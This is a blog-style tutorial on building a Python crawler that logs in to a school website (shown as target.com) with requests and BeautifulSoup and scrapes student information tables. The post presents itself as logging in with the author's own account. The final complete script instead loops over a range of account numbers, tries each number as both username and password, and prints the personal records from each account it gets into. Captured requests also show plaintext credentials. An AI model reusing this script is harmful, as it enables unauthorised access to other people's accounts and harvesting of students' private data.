Programmatically logging in with a Python web crawler

I am going to make a web crawler that will log in to a school website using my credentials and then crawl certain parts of the site. I am using the Beautiful Soup Python library.

Capturing packets and analyzing the HTTP GET & POST requests

When I first captured and analyzed the packets myself, I ran into some problems: my analysis of the login process was not rigorous, so the simulated login kept failing, and a senior student helped me analyze it again. It turned out that the login process actually requires two POST requests. I had previously used the urllib library to simulate the login; this time I used requests, which is a higher-level library than urllib.

The first POST request

POST /renzheng.jsp HTTP/1.1
Host: target.com
Content-Length: 142
Cache-Control: max-age=0
Origin: http://target.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://target.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close
displayName=&displayPasswd=&select=2&submit.x=36&submit.y=14&operType=911&random_form=-1048366953725273893&userName=admin&passwd=ddos

From the first packet we can see that the POST data consists of nine fields:
  • displayName, displayPasswd
  • select, submit.x, submit.y
  • operType, random_form
  • userName, passwd

The second POST request

POST /servlet/adminservlet HTTP/1.1
Host: target.com
Content-Length: 65
Cache-Control: max-age=0
Origin: http://target.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://target.com/admin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close
isValidate=false&userName=admin&passwd=ddos&operType=911

We can see that:

  • userName, passwd: these two parameters are the account name and password, transmitted in clear text
  • isValidate defaults to false
  • operType defaults to 911

The HTTP GET request

GET /student/studentInfo.jsp?userName=xxxx&passwd=xxxxx HTTP/1.1
Host: target.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://target.com/servlet/adminservlet
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,zh;q=0.8
Cookie: UM_distinctid=15b7be26085454-0504ed9f0e367d-3c365402-100200-15b7be26086832; JSESSIONID=213C06E58934DCED50E4E479858CB055
Connection: close

We can see that:

  • userName, passwd: these two parameters are the account name and password, transmitted in clear text

Now we can start writing our Python script.

  1. Simulating and constructing the request packets

    While writing the Python code I tried to take an object-oriented approach: the relevant variables are defined as private attributes, and the login simulation uses the requests module.

    Requests library
    Requests is a Python HTTP library that provides a number of HTTP-related methods; we can use dir(requests) to view the names the library provides.

    >>> import requests
    
    >>> dir(requests)
    ['ConnectionError', 'HTTPError', 'NullHandler', 'PreparedRequest', 'Request', 'RequestException', 'Response', 'Session', 'Timeout', 'TooManyRedirects', 'URLRequired', '__author__', '__build__', '__builtins__', '__copyright__', '__doc__', '__file__', '__license__', '__name__', '__package__', '__path__', '__title__', '__version__', 'adapters', 'api', 'auth', 'certs', 'codes', 'compat', 'cookies', 'delete', 'exceptions', 'get', 'head', 'hooks', 'logging', 'models', 'options', 'patch', 'post', 'put', 'request', 'session', 'sessions', 'status_codes', 'structures', 'utils']

    In this process we use Session, get, post, and the content attribute of the response.
    Session

    The Session object allows you to keep certain parameters across requests. It also persists cookies across all requests made by the same Session instance.

    >>> s = requests.Session()
    >>> r = s.get("http://target.com/")
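
    For example (this mirrors the cookie example from the requests documentation, using httpbin.org): a cookie set by the first request is automatically sent back with the next one, which is exactly what we need so the JSESSIONID survives across our two login POSTs.

    s = requests.Session()
    s.get('http://httpbin.org/cookies/set/sessioncookie/123456789')
    r = s.get('http://httpbin.org/cookies')
    print(r.text)   # {"cookies": {"sessioncookie": "123456789"}}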

    GET submission method

    Request a URL using the GET method:
    >>> r = requests.get("http://target/", proxies=proxies, timeout=0.001, params=payload)
    params passes the parameters for a GET request:
    r = requests.get("http://httpbin.org/get", params=payload)
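
    For our crawler, the same params mechanism can reproduce the studentInfo.jsp GET captured above. A minimal sketch, with placeholder credentials and the same field names as the capture:

    payload = {'userName': 'xxxxxxx', 'passwd': 'xxxxxxx'}   # placeholders for the real account
    r = requests.get("http://target.com/student/studentInfo.jsp", params=payload)
    print(r.url)   # the credentials end up in the query string, in clear text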

    proxies: if you need to use a proxy, you can configure a single request by providing proxies for any request method:
    import requests

    proxies = {
        "http": "http://10.10.1.10:3128",
        "https": "http://10.10.1.10:1080",
    }
    requests.get("http://target.com", proxies=proxies)


    requests stops waiting for a response after the number of seconds set with the timeout parameter:
    >>> requests.get('http://github.com', timeout=0.001)
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    requests.exceptions.Timeout: HTTPConnectionPool(host='github.com', port=80): Request timed out. (timeout=0.001)
    POST submission method 

    Request a URL using the POST method:

    requests.post("http://target.com", headers=header, data=data)

    Here we only need to add the common header fields:

    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Referer': 'http://target.com/',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,zh;q=0.8'
    }

    data – the information submitted in the POST body:
    data = {
        'displayName': '',
        'displayPasswd': '',
        'select': '2',
        'submit.x': '43',
        'submit.y': '12',
        'operType': '911',
        'random_form': '5129319019753764987',
        'userName': '',
        'passwd': ''
    }

    That covers the requests part of the code.
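
    Putting these pieces together, here is a minimal sketch of the two-step login on a shared Session, using the header and data dicts defined above. The URLs and form fields come from the captures (the capture posts to renzheng.jsp, while the full script in section 4 uses admin.jsp as the first URL; use whichever your target actually serves), and the credentials are placeholders:

    import requests

    session = requests.Session()              # keeps JSESSIONID across both POSTs
    data['userName'] = 'xxxxxxx'              # placeholder account
    data['passwd'] = 'xxxxxxx'
    # first POST: the login form
    session.post('http://target.com/renzheng.jsp', data=data, headers=header)
    # second POST: the servlet that actually validates the account
    data2 = {'isValidate': 'false', 'userName': data['userName'],
             'passwd': data['passwd'], 'operType': '911'}
    session.post('http://target.com/servlet/adminservlet', data=data2, headers=header)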

  2. BeautifulSoup library

    BeautifulSoup is a Python library for extracting data from HTML and XML files. It lets you navigate, search, and modify the parse tree using your favorite parser. You can again use dir() to see what the BeautifulSoup package provides:

    >>> import BeautifulSoup
    
    >>> dir(BeautifulSoup)
    ['BeautifulSOAP', 'BeautifulSoup', 'BeautifulStoneSoup', 'CData', 'Comment', 'DEFAULT_OUTPUT_ENCODING', 'Declaration', 'ICantBelieveItsBeautifulSoup', 'MinimalSoup', 'NavigableString', 'PageElement', 'ProcessingInstruction', 'ResultSet', 'RobustHTMLParser', 'RobustInsanelyWackAssHTMLParser', 'RobustWackAssHTMLParser', 'RobustXMLParser', 'SGMLParseError', 'SGMLParser', 'SimplifyingSOAPParser', 'SoupStrainer', 'StopParsing', 'Tag', 'UnicodeDammit', '__author__', '__builtins__', '__copyright__', '__doc__', '__file__', '__license__', '__name__', '__package__', '__version__', '_match_css_class', 'buildTagMap', 'chardet', 'codecs', 'generators', 'markupbase', 'name2codepoint', 're', 'sgmllib', 'types']

    Parsing a document as XML

    By default, Beautiful Soup parses the document as HTML; if you want to parse an XML document, pass "xml" as the second argument to the BeautifulSoup constructor:

    soup = BeautifulSoup(markup, "xml")
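
    A tiny self-contained illustration (the markup string here is made up; XML parsing in bs4 requires the lxml package to be installed):

    from bs4 import BeautifulSoup

    markup = '<students><student name="admin"/></students>'   # made-up sample markup
    soup = BeautifulSoup(markup, "xml")
    print(soup.find('student')['name'])                        # prints: admin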

    find_all()

    The find_all() method returns all the tags in the document that match the given condition, as a list of elements. In practice the information we need lives inside <table> tags; because the return value is a list, we can index into it to locate the <tr> rows we want, and then loop over each row to print the <td> contents.
    The code for looping over the tables is as follows:
    tables = soup.findAll('table')

    tab = tables[0]
    for tr in tab.findAll('tr'):
        for td in tr.findAll('td'):
            print td.getText(),

    The BeautifulSoup part of the code:

    Thirdrequest = self.__session.get(geturl)

    page = Thirdrequest.content
    soup = BeautifulSoup(page, "lxml")
    tr = soup.findAll('tr')
    for i in range(5, 14):
        for td in tr[i].findAll('td'):
            print td.getText(),
  3. Exception handling

    The try/except statement is used to detect errors in the try block; the except clause catches the exception and handles it.
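
    A small illustration in the spirit of the full script below: requests.exceptions.RequestException is the base class for the errors requests itself raises (timeouts, connection failures), and IndexError is what the table-indexing code raises when a page does not have the expected rows:

    import requests

    try:
        r = requests.get('http://target.com/student/studentInfo.jsp', timeout=5)
        rows = []            # stand-in for soup.findAll('tr') in the real script
        print(rows[5])       # raises IndexError when the expected row is missing
    except requests.exceptions.RequestException as e:
        print('request failed: %s' % e)
    except IndexError:
        print('unexpected page layout, skipping')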

  4. The complete Python code
    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    import requests
    import time
    import os
    from bs4 import BeautifulSoup

    class UCrawler(object):
        """docstring for UCrawler"""
        __header = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Referer': 'http://target.com/',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,zh;q=0.8'
        }
        __data1 = {
            'displayName': '',
            'displayPasswd': '',
            'select': '2',
            'submit.x': '43',
            'submit.y': '12',
            'operType': '911',
            'random_form': '5129319019753764987',
            'userName': 'xxxxxxx',
            'passwd': 'xxxxxxx'
        }
        __data2 = {
            'isValidate': 'false',
            'userName': 'xxxxxxx',
            'passwd': 'xxxxxxx',
            'operType': '911',
        }
        __posturl1 = 'http://target.com/admin.jsp'
        __posturl2 = 'http://target.com/servlet/adminservlet'
        __session = requests.Session()

        def Firstlogin(self):
            # first POST of the two-step login
            Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)

        def Secondlogin(self):
            # second POST that actually validates the account
            Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)

        def PrintAndGet(self):
            a = range(xxxxxxxx, xxxxxxx)   # range of account numbers to try
            for tmp in a:
                try:
                    username = str(tmp)
                    password = str(tmp)
                    self.__data1['userName'] = username
                    self.__data1['passwd'] = password
                    self.__data2['userName'] = username
                    self.__data2['passwd'] = password
                    Firstrequest = self.__session.post(self.__posturl1, data=self.__data1, headers=self.__header)
                    Secondrequest = self.__session.post(self.__posturl2, data=self.__data2, headers=self.__header)
                    geturl = 'http://target.com/student/studentInfo.jsp?userName=' + username + '&passwd=' + password
                    # fetch the student page and print the table contents
                    Thirdrequest = self.__session.get(geturl)
                    soup = BeautifulSoup(Thirdrequest.content, "lxml")
                    tr = soup.findAll('tr')
                    for i in range(5, 14):
                        for td in tr[i].findAll('td'):
                            print td.getText(),
                    print '\n'
                except IndexError:
                    continue

    if __name__ == '__main__':
        U = UCrawler()
        U.Firstlogin()
        U.Secondlogin()
        U.PrintAndGet()